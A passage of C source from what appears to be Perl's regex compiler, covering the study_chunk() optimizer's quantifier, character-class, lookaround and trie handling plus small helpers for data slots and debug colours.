_WARN_HELPER(RExC_precomp_end, packWARN(WARN_REGEXP),
Perl_ck_warner(aTHX_ packWARN(WARN_REGEXP),
"Quantifier unexpected on zero-length expression "
"in regex m/%" UTF8f "/",
UTF8fARG(UTF, RExC_precomp_end - RExC_precomp,
RExC_precomp)));
}
if ( ( minnext > 0 && mincount >= SSize_t_MAX / minnext )
|| min >= SSize_t_MAX - minnext * mincount )
{
FAIL("Regexp out of space");
}
min += minnext * mincount;
is_inf_internal |= deltanext == SSize_t_MAX
|| (maxcount == REG_INFTY && minnext + deltanext > 0);
is_inf |= is_inf_internal;
if (is_inf) {
delta = SSize_t_MAX;
} else {
delta += (minnext + deltanext) * maxcount
- minnext * mincount;
}
/* Try powerful optimization CURLYX => CURLYN. */
if ( OP(oscan) == CURLYX && data
&& data->flags & SF_IN_PAR
&& !(data->flags & SF_HAS_EVAL)
&& !deltanext && minnext == 1 ) {
/* Try to optimize to CURLYN. */
regnode *nxt = NEXTOPER(oscan) + EXTRA_STEP_2ARGS;
regnode * const nxt1 = nxt;
#ifdef DEBUGGING
regnode *nxt2;
#endif
/* Skip open. */
nxt = regnext(nxt);
if (!REGNODE_SIMPLE(OP(nxt))
&& !(PL_regkind[OP(nxt)] == EXACT
&& STR_LEN(nxt) == 1))
goto nogo;
#ifdef DEBUGGING
nxt2 = nxt;
#endif
nxt = regnext(nxt);
if (OP(nxt) != CLOSE)
goto nogo;
if (RExC_open_parens) {
/*open->CURLYM*/
RExC_open_parens[ARG(nxt1)] = REGNODE_OFFSET(oscan);
/*close->while*/
RExC_close_parens[ARG(nxt1)] = REGNODE_OFFSET(nxt) + 2;
}
/* Now we know that nxt2 is the only contents: */
oscan->flags = (U8)ARG(nxt);
OP(oscan) = CURLYN;
OP(nxt1) = NOTHING; /* was OPEN. */
#ifdef DEBUGGING
OP(nxt1 + 1) = OPTIMIZED; /* was count. */
NEXT_OFF(nxt1+ 1) = 0; /* just for consistency. */
NEXT_OFF(nxt2) = 0; /* just for consistency with CURLY. */
OP(nxt) = OPTIMIZED; /* was CLOSE. */
OP(nxt + 1) = OPTIMIZED; /* was count. */
NEXT_OFF(nxt+ 1) = 0; /* just for consistency. */
#endif
}
nogo:
/* Try optimization CURLYX => CURLYM. */
if ( OP(oscan) == CURLYX && data
&& !(data->flags & SF_HAS_PAR)
&& !(data->flags & SF_HAS_EVAL)
&& !deltanext /* atom is fixed width */
&& minnext != 0 /* CURLYM can't handle zero width */
/* Nor characters whose fold at run-time may be
* multi-character */
&& ! (RExC_seen & REG_UNFOLDED_MULTI_SEEN)
) {
/* XXXX How to optimize if data == 0? */
/* Optimize to a simpler form. */
regnode *nxt = NEXTOPER(oscan) + EXTRA_STEP_2ARGS; /* OPEN */
regnode *nxt2;
OP(oscan) = CURLYM;
while ( (nxt2 = regnext(nxt)) /* skip over embedded stuff*/
&& (OP(nxt2) != WHILEM))
nxt = nxt2;
                    OP(nxt2) = SUCCEED; /* Was WHILEM */
                    /* Need to optimize away parens. */
if ((data->flags & SF_IN_PAR) && OP(nxt) == CLOSE) {
/* Set the parenth number. */
regnode *nxt1 = NEXTOPER(oscan) + EXTRA_STEP_2ARGS; /* OPEN*/
oscan->flags = (U8)ARG(nxt);
if (RExC_open_parens) {
/*open->CURLYM*/
RExC_open_parens[ARG(nxt1)] = REGNODE_OFFSET(oscan);
/*close->NOTHING*/
RExC_close_parens[ARG(nxt1)] = REGNODE_OFFSET(nxt2)
+ 1;
}
OP(nxt1) = OPTIMIZED; /* was OPEN. */
OP(nxt) = OPTIMIZED; /* was CLOSE. */
#ifdef DEBUGGING
OP(nxt1 + 1) = OPTIMIZED; /* was count. */
OP(nxt + 1) = OPTIMIZED; /* was count. */
NEXT_OFF(nxt1 + 1) = 0; /* just for consistency. */
NEXT_OFF(nxt + 1) = 0; /* just for consistency. */
#endif
#if 0
while ( nxt1 && (OP(nxt1) != WHILEM)) {
regnode *nnxt = regnext(nxt1);
if (nnxt == nxt) {
if (reg_off_by_arg[OP(nxt1)])
ARG_SET(nxt1, nxt2 - nxt1);
else if (nxt2 - nxt1 < U16_MAX)
NEXT_OFF(nxt1) = nxt2 - nxt1;
else
OP(nxt) = NOTHING; /* Cannot beautify */
}
nxt1 = nnxt;
}
#endif
/* Optimize again: */
/* recurse study_chunk() on optimised CURLYX => CURLYM */
study_chunk(pRExC_state, &nxt1, minlenp, &deltanext, nxt,
NULL, stopparen, recursed_depth, NULL, 0,
depth+1);
}
else
oscan->flags = 0;
}
else if ((OP(oscan) == CURLYX)
&& (flags & SCF_WHILEM_VISITED_POS)
/* See the comment on a similar expression above.
However, this time it's not a subexpression
we care about, but the expression itself. */
&& (maxcount == REG_INFTY)
&& data) {
/* This stays as CURLYX, we can put the count/of pair. */
/* Find WHILEM (as in regexec.c) */
regnode *nxt = oscan + NEXT_OFF(oscan);
if (OP(PREVOPER(nxt)) == NOTHING) /* LONGJMP */
nxt += ARG(nxt);
nxt = PREVOPER(nxt);
if (nxt->flags & 0xf) {
/* we've already set whilem count on this node */
} else if (++data->whilem_c < 16) {
assert(data->whilem_c <= RExC_whilem_seen);
nxt->flags = (U8)(data->whilem_c
| (RExC_whilem_seen << 4)); /* On WHILEM */
}
}
if (data && fl & (SF_HAS_PAR|SF_IN_PAR))
pars++;
if (flags & SCF_DO_SUBSTR) {
SV *last_str = NULL;
STRLEN last_chrs = 0;
int counted = mincount != 0;
if (data->last_end > 0 && mincount != 0) { /* Ends with a
string. */
SSize_t b = pos_before >= data->last_start_min
? pos_before : data->last_start_min;
STRLEN l;
const char * const s = SvPV_const(data->last_found, l);
SSize_t old = b - data->last_start_min;
assert(old >= 0);
if (UTF)
old = utf8_hop_forward((U8*)s, old,
(U8 *) SvEND(data->last_found))
- (U8*)s;
l -= old;
/* Get the added string: */
last_str = newSVpvn_utf8(s + old, l, UTF);
last_chrs = UTF ? utf8_length((U8*)(s + old),
(U8*)(s + old + l)) : l;
if (deltanext == 0 && pos_before == b) {
/* What was added is a constant string */
if (mincount > 1) {
SvGROW(last_str, (mincount * l) + 1);
repeatcpy(SvPVX(last_str) + l,
SvPVX_const(last_str), l,
mincount - 1);
SvCUR_set(last_str, SvCUR(last_str) * mincount);
/* Add additional parts. */
SvCUR_set(data->last_found,
SvCUR(data->last_found) - l);
sv_catsv(data->last_found, last_str);
{
SV * sv = data->last_found;
MAGIC *mg =
SvUTF8(sv) && SvMAGICAL(sv) ?
mg_find(sv, PERL_MAGIC_utf8) : NULL;
if (mg && mg->mg_len >= 0)
mg->mg_len += last_chrs * (mincount-1);
}
last_chrs *= mincount;
data->last_end += l * (mincount - 1);
}
} else {
/* start offset must point into the last copy */
data->last_start_min += minnext * (mincount - 1);
data->last_start_max =
is_inf
? SSize_t_MAX
: data->last_start_max +
(maxcount - 1) * (minnext + data->pos_delta);
}
}
/* It is counted once already... */
data->pos_min += minnext * (mincount - counted);
#if 0
Perl_re_printf( aTHX_ "counted=%" UVuf " deltanext=%" UVuf
" SSize_t_MAX=%" UVuf " minnext=%" UVuf
" maxcount=%" UVuf " mincount=%" UVuf "\n",
(UV)counted, (UV)deltanext, (UV)SSize_t_MAX, (UV)minnext, (UV)maxcount,
(UV)mincount);
if (deltanext != SSize_t_MAX)
Perl_re_printf( aTHX_ "LHS=%" UVuf " RHS=%" UVuf "\n",
(UV)(-counted * deltanext + (minnext + deltanext) * maxcount
- minnext * mincount), (UV)(SSize_t_MAX - data->pos_delta));
#endif
if (deltanext == SSize_t_MAX
|| -counted * deltanext + (minnext + deltanext) * maxcount - minnext * mincount >= SSize_t_MAX - data->pos_delta)
data->pos_delta = SSize_t_MAX;
else
data->pos_delta += - counted * deltanext +
(minnext + deltanext) * maxcount - minnext * mincount;
if (mincount != maxcount) {
/* Cannot extend fixed substrings found inside
the group. */
scan_commit(pRExC_state, data, minlenp, is_inf);
if (mincount && last_str) {
SV * const sv = data->last_found;
MAGIC * const mg = SvUTF8(sv) && SvMAGICAL(sv) ?
mg_find(sv, PERL_MAGIC_utf8) : NULL;
if (mg)
mg->mg_len = -1;
sv_setsv(sv, last_str);
data->last_end = data->pos_min;
data->last_start_min = data->pos_min - last_chrs;
data->last_start_max = is_inf
? SSize_t_MAX
: data->pos_min + data->pos_delta - last_chrs;
}
data->cur_is_floating = 1; /* float */
}
SvREFCNT_dec(last_str);
}
if (data && (fl & SF_HAS_EVAL))
data->flags |= SF_HAS_EVAL;
optimize_curly_tail:
rck_elide_nothing(oscan);
continue;
default:
#ifdef DEBUGGING
Perl_croak(aTHX_ "panic: unexpected varying REx opcode %d",
OP(scan));
#endif
case REF:
case CLUMP:
if (flags & SCF_DO_SUBSTR) {
/* Cannot expect anything... */
scan_commit(pRExC_state, data, minlenp, is_inf);
data->cur_is_floating = 1; /* float */
}
is_inf = is_inf_internal = 1;
if (flags & SCF_DO_STCLASS_OR) {
if (OP(scan) == CLUMP) {
/* Actually is any start char, but very few code points
* aren't start characters */
ssc_match_all_cp(data->start_class);
}
else {
ssc_anything(data->start_class);
}
}
flags &= ~SCF_DO_STCLASS;
break;
}
}
else if (OP(scan) == LNBREAK) {
if (flags & SCF_DO_STCLASS) {
if (flags & SCF_DO_STCLASS_AND) {
ssc_intersection(data->start_class,
PL_XPosix_ptrs[_CC_VERTSPACE], FALSE);
ssc_clear_locale(data->start_class);
ANYOF_FLAGS(data->start_class)
&= ~SSC_MATCHES_EMPTY_STRING;
}
else if (flags & SCF_DO_STCLASS_OR) {
ssc_union(data->start_class,
PL_XPosix_ptrs[_CC_VERTSPACE],
FALSE);
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
/* See commit msg for
* 749e076fceedeb708a624933726e7989f2302f6a */
ANYOF_FLAGS(data->start_class)
&= ~SSC_MATCHES_EMPTY_STRING;
}
flags &= ~SCF_DO_STCLASS;
}
min++;
if (delta != SSize_t_MAX)
delta++; /* Because of the 2 char string cr-lf */
if (flags & SCF_DO_SUBSTR) {
/* Cannot expect anything... */
scan_commit(pRExC_state, data, minlenp, is_inf);
data->pos_min += 1;
if (data->pos_delta != SSize_t_MAX) {
data->pos_delta += 1;
}
data->cur_is_floating = 1; /* float */
}
}
else if (REGNODE_SIMPLE(OP(scan))) {
if (flags & SCF_DO_SUBSTR) {
scan_commit(pRExC_state, data, minlenp, is_inf);
data->pos_min++;
}
min++;
if (flags & SCF_DO_STCLASS) {
bool invert = 0;
SV* my_invlist = NULL;
U8 namedclass;
/* See commit msg 749e076fceedeb708a624933726e7989f2302f6a */
ANYOF_FLAGS(data->start_class) &= ~SSC_MATCHES_EMPTY_STRING;
/* Some of the logic below assumes that switching
locale on will only add false positives. */
switch (OP(scan)) {
default:
#ifdef DEBUGGING
Perl_croak(aTHX_ "panic: unexpected simple REx opcode %d",
OP(scan));
#endif
case SANY:
if (flags & SCF_DO_STCLASS_OR) /* Allow everything */
ssc_match_all_cp(data->start_class);
break;
case REG_ANY:
{
SV* REG_ANY_invlist = _new_invlist(2);
REG_ANY_invlist = add_cp_to_invlist(REG_ANY_invlist,
'\n');
if (flags & SCF_DO_STCLASS_OR) {
ssc_union(data->start_class,
REG_ANY_invlist,
TRUE /* TRUE => invert, hence all but \n
*/
);
}
else if (flags & SCF_DO_STCLASS_AND) {
ssc_intersection(data->start_class,
REG_ANY_invlist,
TRUE /* TRUE => invert */
);
ssc_clear_locale(data->start_class);
}
SvREFCNT_dec_NN(REG_ANY_invlist);
}
break;
case ANYOFD:
case ANYOFL:
case ANYOFPOSIXL:
case ANYOFH:
case ANYOF:
if (flags & SCF_DO_STCLASS_AND)
ssc_and(pRExC_state, data->start_class,
(regnode_charclass *) scan);
else
ssc_or(pRExC_state, data->start_class,
(regnode_charclass *) scan);
break;
case NANYOFM:
case ANYOFM:
{
SV* cp_list = get_ANYOFM_contents(scan);
if (flags & SCF_DO_STCLASS_OR) {
ssc_union(data->start_class, cp_list, invert);
}
else if (flags & SCF_DO_STCLASS_AND) {
ssc_intersection(data->start_class, cp_list, invert);
}
SvREFCNT_dec_NN(cp_list);
break;
}
case NPOSIXL:
invert = 1;
/* FALLTHROUGH */
case POSIXL:
namedclass = classnum_to_namedclass(FLAGS(scan)) + invert;
if (flags & SCF_DO_STCLASS_AND) {
bool was_there = cBOOL(
ANYOF_POSIXL_TEST(data->start_class,
namedclass));
ANYOF_POSIXL_ZERO(data->start_class);
if (was_there) { /* Do an AND */
ANYOF_POSIXL_SET(data->start_class, namedclass);
}
/* No individual code points can now match */
data->start_class->invlist
= sv_2mortal(_new_invlist(0));
}
else {
int complement = namedclass + ((invert) ? -1 : 1);
assert(flags & SCF_DO_STCLASS_OR);
/* If the complement of this class was already there,
* the result is that they match all code points,
* (\d + \D == everything). Remove the classes from
* future consideration. Locale is not relevant in
* this case */
if (ANYOF_POSIXL_TEST(data->start_class, complement)) {
ssc_match_all_cp(data->start_class);
ANYOF_POSIXL_CLEAR(data->start_class, namedclass);
ANYOF_POSIXL_CLEAR(data->start_class, complement);
}
else { /* The usual case; just add this class to the
existing set */
ANYOF_POSIXL_SET(data->start_class, namedclass);
}
}
break;
case NPOSIXA: /* For these, we always know the exact set of
what's matched */
invert = 1;
/* FALLTHROUGH */
case POSIXA:
my_invlist = invlist_clone(PL_Posix_ptrs[FLAGS(scan)], NULL);
goto join_posix_and_ascii;
case NPOSIXD:
case NPOSIXU:
invert = 1;
/* FALLTHROUGH */
case POSIXD:
case POSIXU:
my_invlist = invlist_clone(PL_XPosix_ptrs[FLAGS(scan)], NULL);
/* NPOSIXD matches all upper Latin1 code points unless the
* target string being matched is UTF-8, which is
* unknowable until match time. Since we are going to
* invert, we want to get rid of all of them so that the
* inversion will match all */
if (OP(scan) == NPOSIXD) {
_invlist_subtract(my_invlist, PL_UpperLatin1,
&my_invlist);
}
join_posix_and_ascii:
if (flags & SCF_DO_STCLASS_AND) {
ssc_intersection(data->start_class, my_invlist, invert);
ssc_clear_locale(data->start_class);
}
else {
assert(flags & SCF_DO_STCLASS_OR);
ssc_union(data->start_class, my_invlist, invert);
}
SvREFCNT_dec(my_invlist);
}
if (flags & SCF_DO_STCLASS_OR)
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
flags &= ~SCF_DO_STCLASS;
}
}
else if (PL_regkind[OP(scan)] == EOL && flags & SCF_DO_SUBSTR) {
data->flags |= (OP(scan) == MEOL
? SF_BEFORE_MEOL
: SF_BEFORE_SEOL);
scan_commit(pRExC_state, data, minlenp, is_inf);
}
else if ( PL_regkind[OP(scan)] == BRANCHJ
/* Lookbehind, or need to calculate parens/evals/stclass: */
&& (scan->flags || data || (flags & SCF_DO_STCLASS))
&& (OP(scan) == IFMATCH || OP(scan) == UNLESSM))
{
if ( !PERL_ENABLE_POSITIVE_ASSERTION_STUDY
|| OP(scan) == UNLESSM )
{
/* Negative Lookahead/lookbehind
In this case we can't do fixed string optimisation.
*/
SSize_t deltanext, minnext, fake = 0;
regnode *nscan;
regnode_ssc intrnl;
int f = 0;
StructCopy(&zero_scan_data, &data_fake, scan_data_t);
if (data) {
data_fake.whilem_c = data->whilem_c;
data_fake.last_closep = data->last_closep;
}
else
data_fake.last_closep = &fake;
data_fake.pos_delta = delta;
if ( flags & SCF_DO_STCLASS && !scan->flags
&& OP(scan) == IFMATCH ) { /* Lookahead */
ssc_init(pRExC_state, &intrnl);
data_fake.start_class = &intrnl;
f |= SCF_DO_STCLASS_AND;
}
if (flags & SCF_WHILEM_VISITED_POS)
f |= SCF_WHILEM_VISITED_POS;
next = regnext(scan);
nscan = NEXTOPER(NEXTOPER(scan));
/* recurse study_chunk() for lookahead body */
minnext = study_chunk(pRExC_state, &nscan, minlenp, &deltanext,
last, &data_fake, stopparen,
recursed_depth, NULL, f, depth+1);
if (scan->flags) {
if ( deltanext < 0
|| deltanext > (I32) U8_MAX
|| minnext > (I32)U8_MAX
|| minnext + deltanext > (I32)U8_MAX)
{
FAIL2("Lookbehind longer than %" UVuf " not implemented",
(UV)U8_MAX);
}
/* The 'next_off' field has been repurposed to count the
* additional starting positions to try beyond the initial
* one. (This leaves it at 0 for non-variable length
* matches to avoid breakage for those not using this
* extension) */
if (deltanext) {
scan->next_off = deltanext;
ckWARNexperimental(RExC_parse,
WARN_EXPERIMENTAL__VLB,
"Variable length lookbehind is experimental");
}
scan->flags = (U8)minnext + deltanext;
}
if (data) {
if (data_fake.flags & (SF_HAS_PAR|SF_IN_PAR))
pars++;
if (data_fake.flags & SF_HAS_EVAL)
data->flags |= SF_HAS_EVAL;
data->whilem_c = data_fake.whilem_c;
}
if (f & SCF_DO_STCLASS_AND) {
if (flags & SCF_DO_STCLASS_OR) {
/* OR before, AND after: ideally we would recurse with
* data_fake to get the AND applied by study of the
* remainder of the pattern, and then derecurse;
* *** HACK *** for now just treat as "no information".
* See [perl #56690].
*/
ssc_init(pRExC_state, data->start_class);
} else {
/* AND before and after: combine and continue. These
* assertions are zero-length, so can match an EMPTY
* string */
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) &intrnl);
ANYOF_FLAGS(data->start_class)
|= SSC_MATCHES_EMPTY_STRING;
}
}
}
#if PERL_ENABLE_POSITIVE_ASSERTION_STUDY
else {
/* Positive Lookahead/lookbehind
In this case we can do fixed string optimisation,
but we must be careful about it. Note in the case of
lookbehind the positions will be offset by the minimum
length of the pattern, something we won't know about
until after the recurse.
*/
SSize_t deltanext, fake = 0;
regnode *nscan;
regnode_ssc intrnl;
int f = 0;
/* We use SAVEFREEPV so that when the full compile
is finished perl will clean up the allocated
minlens when it's all done. This way we don't
have to worry about freeing them when we know
                   they won't be used, which would be a pain.
*/
SSize_t *minnextp;
Newx( minnextp, 1, SSize_t );
SAVEFREEPV(minnextp);
if (data) {
StructCopy(data, &data_fake, scan_data_t);
if ((flags & SCF_DO_SUBSTR) && data->last_found) {
f |= SCF_DO_SUBSTR;
if (scan->flags)
scan_commit(pRExC_state, &data_fake, minlenp, is_inf);
data_fake.last_found=newSVsv(data->last_found);
}
}
else
data_fake.last_closep = &fake;
data_fake.flags = 0;
data_fake.substrs[0].flags = 0;
data_fake.substrs[1].flags = 0;
data_fake.pos_delta = delta;
if (is_inf)
data_fake.flags |= SF_IS_INF;
if ( flags & SCF_DO_STCLASS && !scan->flags
&& OP(scan) == IFMATCH ) { /* Lookahead */
ssc_init(pRExC_state, &intrnl);
data_fake.start_class = &intrnl;
f |= SCF_DO_STCLASS_AND;
}
if (flags & SCF_WHILEM_VISITED_POS)
f |= SCF_WHILEM_VISITED_POS;
next = regnext(scan);
nscan = NEXTOPER(NEXTOPER(scan));
/* positive lookahead study_chunk() recursion */
*minnextp = study_chunk(pRExC_state, &nscan, minnextp,
&deltanext, last, &data_fake,
stopparen, recursed_depth, NULL,
f, depth+1);
if (scan->flags) {
assert(0); /* This code has never been tested since this
is normally not compiled */
if ( deltanext < 0
|| deltanext > (I32) U8_MAX
|| *minnextp > (I32)U8_MAX
|| *minnextp + deltanext > (I32)U8_MAX)
{
FAIL2("Lookbehind longer than %" UVuf " not implemented",
(UV)U8_MAX);
}
if (deltanext) {
scan->next_off = deltanext;
}
scan->flags = (U8)*minnextp + deltanext;
}
*minnextp += min;
if (f & SCF_DO_STCLASS_AND) {
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) &intrnl);
ANYOF_FLAGS(data->start_class) |= SSC_MATCHES_EMPTY_STRING;
}
if (data) {
if (data_fake.flags & (SF_HAS_PAR|SF_IN_PAR))
pars++;
if (data_fake.flags & SF_HAS_EVAL)
data->flags |= SF_HAS_EVAL;
data->whilem_c = data_fake.whilem_c;
if ((flags & SCF_DO_SUBSTR) && data_fake.last_found) {
int i;
if (RExC_rx->minlen<*minnextp)
RExC_rx->minlen=*minnextp;
scan_commit(pRExC_state, &data_fake, minnextp, is_inf);
SvREFCNT_dec_NN(data_fake.last_found);
for (i = 0; i < 2; i++) {
if (data_fake.substrs[i].minlenp != minlenp) {
data->substrs[i].min_offset =
data_fake.substrs[i].min_offset;
data->substrs[i].max_offset =
data_fake.substrs[i].max_offset;
data->substrs[i].minlenp =
data_fake.substrs[i].minlenp;
data->substrs[i].lookbehind += scan->flags;
}
}
}
}
}
#endif
}
else if (OP(scan) == OPEN) {
if (stopparen != (I32)ARG(scan))
pars++;
}
else if (OP(scan) == CLOSE) {
if (stopparen == (I32)ARG(scan)) {
break;
}
if ((I32)ARG(scan) == is_par) {
next = regnext(scan);
if ( next && (OP(next) != WHILEM) && next < last)
is_par = 0; /* Disable optimization */
}
if (data)
*(data->last_closep) = ARG(scan);
}
else if (OP(scan) == EVAL) {
if (data)
data->flags |= SF_HAS_EVAL;
}
else if ( PL_regkind[OP(scan)] == ENDLIKE ) {
if (flags & SCF_DO_SUBSTR) {
scan_commit(pRExC_state, data, minlenp, is_inf);
flags &= ~SCF_DO_SUBSTR;
}
if (data && OP(scan)==ACCEPT) {
data->flags |= SCF_SEEN_ACCEPT;
if (stopmin > min)
stopmin = min;
}
}
else if (OP(scan) == LOGICAL && scan->flags == 2) /* Embedded follows */
{
if (flags & SCF_DO_SUBSTR) {
scan_commit(pRExC_state, data, minlenp, is_inf);
data->cur_is_floating = 1; /* float */
}
is_inf = is_inf_internal = 1;
if (flags & SCF_DO_STCLASS_OR) /* Allow everything */
ssc_anything(data->start_class);
flags &= ~SCF_DO_STCLASS;
}
else if (OP(scan) == GPOS) {
if (!(RExC_rx->intflags & PREGf_GPOS_FLOAT) &&
!(delta || is_inf || (data && data->pos_delta)))
{
if (!(RExC_rx->intflags & PREGf_ANCH) && (flags & SCF_DO_SUBSTR))
RExC_rx->intflags |= PREGf_ANCH_GPOS;
if (RExC_rx->gofs < (STRLEN)min)
RExC_rx->gofs = min;
} else {
RExC_rx->intflags |= PREGf_GPOS_FLOAT;
RExC_rx->gofs = 0;
}
}
#ifdef TRIE_STUDY_OPT
#ifdef FULL_TRIE_STUDY
else if (PL_regkind[OP(scan)] == TRIE) {
/* NOTE - There is similar code to this block above for handling
BRANCH nodes on the initial study. If you change stuff here
check there too. */
regnode *trie_node= scan;
regnode *tail= regnext(scan);
reg_trie_data *trie = (reg_trie_data*)RExC_rxi->data->data[ ARG(scan) ];
SSize_t max1 = 0, min1 = SSize_t_MAX;
regnode_ssc accum;
if (flags & SCF_DO_SUBSTR) { /* XXXX Add !SUSPEND? */
/* Cannot merge strings after this. */
scan_commit(pRExC_state, data, minlenp, is_inf);
}
if (flags & SCF_DO_STCLASS)
ssc_init_zero(pRExC_state, &accum);
if (!trie->jump) {
min1= trie->minlen;
max1= trie->maxlen;
} else {
const regnode *nextbranch= NULL;
U32 word;
for ( word=1 ; word <= trie->wordcount ; word++)
{
SSize_t deltanext=0, minnext=0, f = 0, fake;
regnode_ssc this_class;
StructCopy(&zero_scan_data, &data_fake, scan_data_t);
if (data) {
data_fake.whilem_c = data->whilem_c;
data_fake.last_closep = data->last_closep;
}
else
data_fake.last_closep = &fake;
data_fake.pos_delta = delta;
if (flags & SCF_DO_STCLASS) {
ssc_init(pRExC_state, &this_class);
data_fake.start_class = &this_class;
f = SCF_DO_STCLASS_AND;
}
if (flags & SCF_WHILEM_VISITED_POS)
f |= SCF_WHILEM_VISITED_POS;
if (trie->jump[word]) {
if (!nextbranch)
nextbranch = trie_node + trie->jump[0];
scan= trie_node + trie->jump[word];
/* We go from the jump point to the branch that follows
                               it. Note this means we need the vestigial unused
                               branches even though they aren't otherwise used. */
/* optimise study_chunk() for TRIE */
minnext = study_chunk(pRExC_state, &scan, minlenp,
&deltanext, (regnode *)nextbranch, &data_fake,
stopparen, recursed_depth, NULL, f, depth+1);
}
if (nextbranch && PL_regkind[OP(nextbranch)]==BRANCH)
nextbranch= regnext((regnode*)nextbranch);
if (min1 > (SSize_t)(minnext + trie->minlen))
min1 = minnext + trie->minlen;
if (deltanext == SSize_t_MAX) {
is_inf = is_inf_internal = 1;
max1 = SSize_t_MAX;
} else if (max1 < (SSize_t)(minnext + deltanext + trie->maxlen))
max1 = minnext + deltanext + trie->maxlen;
if (data_fake.flags & (SF_HAS_PAR|SF_IN_PAR))
pars++;
if (data_fake.flags & SCF_SEEN_ACCEPT) {
if ( stopmin > min + min1)
stopmin = min + min1;
flags &= ~SCF_DO_SUBSTR;
if (data)
data->flags |= SCF_SEEN_ACCEPT;
}
if (data) {
if (data_fake.flags & SF_HAS_EVAL)
data->flags |= SF_HAS_EVAL;
data->whilem_c = data_fake.whilem_c;
}
if (flags & SCF_DO_STCLASS)
ssc_or(pRExC_state, &accum, (regnode_charclass *) &this_class);
}
}
if (flags & SCF_DO_SUBSTR) {
data->pos_min += min1;
data->pos_delta += max1 - min1;
if (max1 != min1 || is_inf)
data->cur_is_floating = 1; /* float */
}
min += min1;
if (delta != SSize_t_MAX) {
if (SSize_t_MAX - (max1 - min1) >= delta)
delta += max1 - min1;
else
delta = SSize_t_MAX;
}
if (flags & SCF_DO_STCLASS_OR) {
ssc_or(pRExC_state, data->start_class, (regnode_charclass *) &accum);
if (min1) {
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
flags &= ~SCF_DO_STCLASS;
}
}
else if (flags & SCF_DO_STCLASS_AND) {
if (min1) {
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) &accum);
flags &= ~SCF_DO_STCLASS;
}
else {
/* Switch to OR mode: cache the old value of
* data->start_class */
INIT_AND_WITHP;
StructCopy(data->start_class, and_withp, regnode_ssc);
flags &= ~SCF_DO_STCLASS_AND;
StructCopy(&accum, data->start_class, regnode_ssc);
flags |= SCF_DO_STCLASS_OR;
}
}
scan= tail;
continue;
}
#else
else if (PL_regkind[OP(scan)] == TRIE) {
reg_trie_data *trie = (reg_trie_data*)RExC_rxi->data->data[ ARG(scan) ];
U8*bang=NULL;
min += trie->minlen;
delta += (trie->maxlen - trie->minlen);
flags &= ~SCF_DO_STCLASS; /* xxx */
if (flags & SCF_DO_SUBSTR) {
/* Cannot expect anything... */
scan_commit(pRExC_state, data, minlenp, is_inf);
data->pos_min += trie->minlen;
data->pos_delta += (trie->maxlen - trie->minlen);
if (trie->maxlen != trie->minlen)
data->cur_is_floating = 1; /* float */
}
if (trie->jump) /* no more substrings -- for now /grr*/
flags &= ~SCF_DO_SUBSTR;
}
#endif /* old or new */
#endif /* TRIE_STUDY_OPT */
/* Else: zero-length, ignore. */
scan = regnext(scan);
}
finish:
if (frame) {
/* we need to unwind recursion. */
depth = depth - 1;
DEBUG_STUDYDATA("frame-end", data, depth, is_inf);
DEBUG_PEEP("fend", scan, depth, flags);
/* restore previous context */
last = frame->last_regnode;
scan = frame->next_regnode;
stopparen = frame->stopparen;
recursed_depth = frame->prev_recursed_depth;
RExC_frame_last = frame->prev_frame;
frame = frame->this_prev_frame;
goto fake_study_recurse;
}
assert(!frame);
DEBUG_STUDYDATA("pre-fin", data, depth, is_inf);
*scanp = scan;
*deltap = is_inf_internal ? SSize_t_MAX : delta;
if (flags & SCF_DO_SUBSTR && is_inf)
data->pos_delta = SSize_t_MAX - data->pos_min;
if (is_par > (I32)U8_MAX)
is_par = 0;
if (is_par && pars==1 && data) {
data->flags |= SF_IN_PAR;
data->flags &= ~SF_HAS_PAR;
}
else if (pars && data) {
data->flags |= SF_HAS_PAR;
data->flags &= ~SF_IN_PAR;
}
if (flags & SCF_DO_STCLASS_OR)
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
if (flags & SCF_TRIE_RESTUDY)
data->flags |= SCF_TRIE_RESTUDY;
DEBUG_STUDYDATA("post-fin", data, depth, is_inf);
{
SSize_t final_minlen= min < stopmin ? min : stopmin;
if (!(RExC_seen & REG_UNBOUNDED_QUANTIFIER_SEEN)) {
if (final_minlen > SSize_t_MAX - delta)
RExC_maxlen = SSize_t_MAX;
else if (RExC_maxlen < final_minlen + delta)
RExC_maxlen = final_minlen + delta;
}
return final_minlen;
}
NOT_REACHED; /* NOTREACHED */
}
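/* S_add_data(): grow the regexp program's data array by 'n' slots whose type
 * characters are given in 's', and return the index of the first slot just
 * added; the slots themselves are left for the caller to fill in. */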
STATIC U32
S_add_data(RExC_state_t* const pRExC_state, const char* const s, const U32 n)
{
U32 count = RExC_rxi->data ? RExC_rxi->data->count : 0;
PERL_ARGS_ASSERT_ADD_DATA;
Renewc(RExC_rxi->data,
sizeof(*RExC_rxi->data) + sizeof(void*) * (count + n - 1),
char, struct reg_data);
if(count)
Renew(RExC_rxi->data->what, count + n, U8);
else
Newx(RExC_rxi->data->what, n, U8);
RExC_rxi->data->count = count + n;
Copy(s, RExC_rxi->data->what + count, n, U8);
return count;
}
/* XXX: TODO: make this not be included in a non-debugging perl; it appears to
 * be used there anyway, via 'use re' */
#ifndef PERL_IN_XSUB_RE
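/* Initialize PL_colors[] from the PERL_RE_COLORS environment variable: a
 * tab-separated list of up to six strings (typically terminal escape
 * sequences) used to highlight regex debugging output.  Missing entries, or
 * an unset variable, leave the corresponding slots as empty strings. */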
void
Perl_reginitcolors(pTHX)
{
const char * const s = PerlEnv_getenv("PERL_RE_COLORS");
if (s) {
char *t = savepv(s);
int i = 0;
PL_colors[0] = t;
while (++i < 6) {
t = strchr(t, '\t');
if (t) {
*t = '\0';
PL_colors[i] = ++t;
}
else
PL_colors[i] = t = (char *)"";
}
} else {
int i = 0;
while (i < 6)
PL_colors[i++] = (char *)"";
}
PL_colorset = 1;
}
#endif
#ifdef TRIE_STUDY_OPT
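/* CHECK_RESTUDY_GOTO_butfirst(dOsomething): if the study pass that just
 * finished requested a restudy (SCF_TRIE_RESTUDY, set when a trie was built)
 * and we haven't restudied yet, execute 'dOsomething' and jump back to the
 * reStudy label so the optimizer runs again over the rewritten program. */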
#define CHECK_RESTUDY_GOTO_butfirst(dOsomething) \
STMT_START { \
if ( \
